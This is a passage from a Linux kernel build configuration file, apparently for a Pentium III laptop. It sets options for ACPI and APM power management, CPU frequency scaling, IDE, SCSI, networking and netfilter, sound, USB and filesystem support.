CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set CONFIG_MPENTIUMIII=y # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_HPET_TIMER=y CONFIG_HPET_EMULATE_RTC=y # CONFIG_SMP is not set CONFIG_PREEMPT=y CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set CONFIG_I8K=m CONFIG_MICROCODE=m CONFIG_X86_MSR=m CONFIG_X86_CPUID=m # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set CONFIG_PM_DISK=y CONFIG_PM_DISK_PARTITION="" # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y CONFIG_ACPI_AC=m CONFIG_ACPI_BATTERY=m CONFIG_ACPI_BUTTON=m CONFIG_ACPI_FAN=m CONFIG_ACPI_PROCESSOR=m CONFIG_ACPI_THERMAL=m CONFIG_ACPI_ASUS=m CONFIG_ACPI_TOSHIBA=m # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_ACPI_RELAXED_AML is not set # # APM (Advanced Power Management) BIOS Support # CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set # CONFIG_APM_DO_ENABLE is not set # CONFIG_APM_CPU_IDLE is not set # CONFIG_APM_DISPLAY_BLANK is not set # CONFIG_APM_RTC_IS_GMT is not set CONFIG_APM_ALLOW_INTS=y # CONFIG_APM_REAL_MODE_POWER_OFF is not set # # CPU Frequency scaling # CONFIG_CPU_FREQ=y # CONFIG_CPU_FREQ_PROC_INTF is not set CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE=y # CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE is not set CONFIG_CPU_FREQ_GOV_PERFORMANCE=y CONFIG_CPU_FREQ_GOV_POWERSAVE=m CONFIG_CPU_FREQ_GOV_USERSPACE=m # CONFIG_CPU_FREQ_24_API is not set CONFIG_CPU_FREQ_TABLE=y # # CPUFreq processor drivers # CONFIG_X86_ACPI_CPUFREQ=m # CONFIG_X86_ACPI_CPUFREQ_PROC_INTF is not set # CONFIG_X86_POWERNOW_K6 is not set # CONFIG_X86_POWERNOW_K7 is not set # CONFIG_X86_POWERNOW_K8 is not set # CONFIG_X86_GX_SUSPMOD is not set CONFIG_X86_SPEEDSTEP_CENTRINO=m CONFIG_X86_SPEEDSTEP_ICH=m CONFIG_X86_SPEEDSTEP_SMI=m CONFIG_X86_SPEEDSTEP_LIB=m # CONFIG_X86_P4_CLOCKMOD is not set # CONFIG_X86_LONGRUN is not set # CONFIG_X86_LONGHAUL is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # CONFIG_PCMCIA=m # CONFIG_YENTA is not set # CONFIG_I82092 is not set # CONFIG_TCIC is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y # CONFIG_BINFMT_AOUT is not set CONFIG_BINFMT_MISC=m # # Device Drivers # # # Generic Driver Options # # CONFIG_FW_LOADER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_PC_CML1=m # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_PC_PCMCIA is not set # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play support # # CONFIG_PNP is not set # # Block devices # # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=m # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_BLK_DEV_INITRD is not set # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y # CONFIG_IDEDISK_MULTI_MODE is not set # CONFIG_IDEDISK_STROKE is not set # CONFIG_BLK_DEV_IDECS is not set CONFIG_BLK_DEV_IDECD=m # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_TASKFILE_IO=y # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_GENERIC is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_DMA_NONPCI is not set # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=m CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=m # CONFIG_BLK_DEV_SR_VENDOR is not set CONFIG_CHR_DEV_SG=m # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set # CONFIG_SCSI_REPORT_LUNS is not set # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # PCMCIA SCSI adapter support # # CONFIG_PCMCIA_AHA152X is not set # CONFIG_PCMCIA_FDOMAIN is not set # CONFIG_PCMCIA_NINJA_SCSI is not set # CONFIG_PCMCIA_QLOGIC is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y # CONFIG_IP_MULTICAST is not set # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set CONFIG_SYN_COOKIES=y CONFIG_INET_AH=m CONFIG_INET_ESP=m CONFIG_INET_IPCOMP=m # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m # CONFIG_IP_NF_FTP is not set # CONFIG_IP_NF_IRC is not set # CONFIG_IP_NF_TFTP is not set # CONFIG_IP_NF_AMANDA is not set # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=m # CONFIG_IP_NF_MATCH_LIMIT is not set # CONFIG_IP_NF_MATCH_IPRANGE is not set # CONFIG_IP_NF_MATCH_MAC is not set # CONFIG_IP_NF_MATCH_PKTTYPE is not set # CONFIG_IP_NF_MATCH_MARK is not set # CONFIG_IP_NF_MATCH_MULTIPORT is not set # CONFIG_IP_NF_MATCH_TOS is not set # CONFIG_IP_NF_MATCH_RECENT is not set # CONFIG_IP_NF_MATCH_ECN is not set # CONFIG_IP_NF_MATCH_DSCP is not set # CONFIG_IP_NF_MATCH_AH_ESP is not set # CONFIG_IP_NF_MATCH_LENGTH is not set # CONFIG_IP_NF_MATCH_TTL is not set # CONFIG_IP_NF_MATCH_TCPMSS is not set # CONFIG_IP_NF_MATCH_HELPER is not set CONFIG_IP_NF_MATCH_STATE=m # CONFIG_IP_NF_MATCH_CONNTRACK is not set # CONFIG_IP_NF_MATCH_OWNER is not set CONFIG_IP_NF_FILTER=m # CONFIG_IP_NF_TARGET_REJECT is not set # CONFIG_IP_NF_NAT is not set # CONFIG_IP_NF_MANGLE is not set # CONFIG_IP_NF_TARGET_LOG is not set # CONFIG_IP_NF_TARGET_ULOG is not set # CONFIG_IP_NF_TARGET_TCPMSS is not set # CONFIG_IP_NF_ARPTABLES is not set # CONFIG_IP_NF_COMPAT_IPCHAINS is not set # CONFIG_IP_NF_COMPAT_IPFWADM is not set CONFIG_XFRM=y CONFIG_XFRM_USER=m # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set CONFIG_NET_VENDOR_3COM=y CONFIG_VORTEX=m # CONFIG_TYPHOON is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set # CONFIG_NET_PCI is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SIS190 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=m # CONFIG_PPP_MULTILINK is not set CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=m # CONFIG_PPP_SYNC_TTY is not set CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m # CONFIG_PPPOE is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices # # CONFIG_TR is not set # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # PCMCIA network device support # # CONFIG_NET_PCMCIA is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # CONFIG_IRDA=m # # IrDA protocols # # CONFIG_IRLAN is not set # CONFIG_IRNET is not set CONFIG_IRCOMM=m # CONFIG_IRDA_ULTRA is not set # # IrDA options # # CONFIG_IRDA_CACHE_LAST_LSAP is not set # CONFIG_IRDA_FAST_RR is not set # CONFIG_IRDA_DEBUG is not set # # Infrared-port device drivers # # # SIR device drivers # CONFIG_IRTTY_SIR=m # # Dongle support # # CONFIG_DONGLE is not set # # Old SIR device drivers # # CONFIG_IRPORT_SIR is not set # # Old Serial dongle support # # # FIR device drivers # # CONFIG_USB_IRDA is not set # CONFIG_TOSHIBA_FIR is not set # CONFIG_VLSI_FIR is not set # # Bluetooth support # # CONFIG_BT is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=m # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=m # CONFIG_MOUSE_PS2_SYNAPTICS is not set # CONFIG_MOUSE_SERIAL is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_CONSOLE=y CONFIG_SERIAL_8250_CS=m # CONFIG_SERIAL_8250_ACPI is not set CONFIG_SERIAL_8250_NR_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_SERIAL_CORE_CONSOLE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=128 # CONFIG_PRINTER is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # I2C support # # CONFIG_I2C is not set # # I2C Algorithms # # # I2C Hardware Bus support # # # I2C Hardware Sensors Chip support # # CONFIG_I2C_SENSOR is not set # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD64 is not set CONFIG_AGP_INTEL=m # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_VIA is not set CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_GAMMA is not set CONFIG_DRM_R128=m # CONFIG_DRM_RADEON is not set # CONFIG_DRM_I810 is not set # CONFIG_DRM_I830 is not set # CONFIG_DRM_MGA is not set # CONFIG_DRM_SIS is not set # # PCMCIA character devices # # CONFIG_SYNCLINK_CS is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set CONFIG_HANGCHECK_TIMER=m # # Multimedia devices # CONFIG_VIDEO_DEV=m # # Video For Linux # # # Video Adapters # # CONFIG_VIDEO_BWQCAM is not set # CONFIG_VIDEO_CQCAM is not set # CONFIG_VIDEO_W9966 is not set # CONFIG_VIDEO_CPIA is not set # CONFIG_VIDEO_STRADIS is not set # CONFIG_VIDEO_MXB is not set # CONFIG_VIDEO_DPC is not set # CONFIG_VIDEO_HEXIUM_ORION is not set # CONFIG_VIDEO_HEXIUM_GEMINI is not set # # Radio Adapters # # CONFIG_RADIO_GEMTEK_PCI is not set # CONFIG_RADIO_MAXIRADIO is not set # CONFIG_RADIO_MAESTRO is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # CONFIG_VIDEO_BTCX is not set # # Graphics support # CONFIG_FB=y # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y CONFIG_VIDEO_SELECT=y # CONFIG_FB_HGA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_I810 is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y CONFIG_PCI_CONSOLE=y CONFIG_FONTS=y # CONFIG_FONT_8x8 is not set CONFIG_FONT_8x16=y # CONFIG_FONT_6x11 is not set # CONFIG_FONT_PEARL_8x8 is not set # CONFIG_FONT_ACORN_8x8 is not set # CONFIG_FONT_MINI_4x6 is not set # CONFIG_FONT_SUN8x16 is not set # CONFIG_FONT_SUN12x22 is not set # # Logo configuration # CONFIG_LOGO=y # CONFIG_LOGO_LINUX_MONO is not set # CONFIG_LOGO_LINUX_VGA16 is not set CONFIG_LOGO_LINUX_CLUT224=y # # Sound # CONFIG_SOUND=m # # Advanced Linux Sound Architecture # CONFIG_SND=m # CONFIG_SND_SEQUENCER is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_RTCTIMER=m CONFIG_SND_VERBOSE_PRINTK=y CONFIG_SND_DEBUG=y CONFIG_SND_DEBUG_MEMORY=y CONFIG_SND_DEBUG_DETECT=y # # Generic devices # CONFIG_SND_DUMMY=m # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set CONFIG_SND_MAESTRO3=m # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # PCMCIA devices # # CONFIG_SND_VXPOCKET is not set # CONFIG_SND_VXP440 is not set # # Open Sound System # CONFIG_SOUND_PRIME=m # CONFIG_SOUND_BT878 is not set # CONFIG_SOUND_CMPCI is not set # CONFIG_SOUND_EMU10K1 is not set # CONFIG_SOUND_FUSION is not set # CONFIG_SOUND_CS4281 is not set # CONFIG_SOUND_ES1370 is not set # CONFIG_SOUND_ES1371 is not set # CONFIG_SOUND_ESSSOLO1 is not set # CONFIG_SOUND_MAESTRO is not set CONFIG_SOUND_MAESTRO3=m # CONFIG_SOUND_ICH is not set # CONFIG_SOUND_SONICVIBES is not set # CONFIG_SOUND_TRIDENT is not set # CONFIG_SOUND_VIA82CXXX is not set # CONFIG_SOUND_OSS is not set # CONFIG_SOUND_ALI5455 is not set # CONFIG_SOUND_FORTE is not set # CONFIG_SOUND_RME96XX is not set # CONFIG_SOUND_AD1980 is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # # CONFIG_USB_EHCI_HCD is not set # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=y # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set CONFIG_USB_STORAGE=m # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_HP8200e is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set # CONFIG_USB_HIDDEV is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # CONFIG_USB_VICAM is not set # CONFIG_USB_DSBR is not set # CONFIG_USB_IBMCAM is not set # CONFIG_USB_KONICAWC is not set # CONFIG_USB_OV511 is not set # CONFIG_USB_PWC is not set # CONFIG_USB_SE401 is not set # CONFIG_USB_STV680 is not set # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # CONFIG_USB_GADGET is not set # # File systems # CONFIG_EXT2_FS=m # CONFIG_EXT2_FS_XATTR is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y # CONFIG_EXT3_FS_SECURITY is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y CONFIG_REISERFS_FS=m # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AUTOFS4_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=m CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=m CONFIG_UDF_FS=m # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=m # CONFIG_MSDOS_FS is not set CONFIG_VFAT_FS=m CONFIG_NTFS_FS=m # CONFIG_NTFS_DEBUG is not set # CONFIG_NTFS_RW is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_DEVFS_FS=y # CONFIG_DEVFS_MOUNT is not set # CONFIG_DEVFS_DEBUG is not set CONFIG_DEVPTS_FS=y # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y # CONFIG_HUGETLBFS is not set # CONFIG_HUGETLB_PAGE is not set CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=m CONFIG_NFS_V3=y # CONFIG_NFS_V4 is not set # CONFIG_NFSD is not set CONFIG_LOCKD=m CONFIG_LOCKD_V4=y # CONFIG_EXPORTFS is not set CONFIG_SUNRPC=m # CONFIG_SUNRPC_GSS is not set CONFIG_SMB_FS=m CONFIG_SMB_NLS_DEFAULT=y CONFIG_SMB_NLS_REMOTE="cp850" # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # 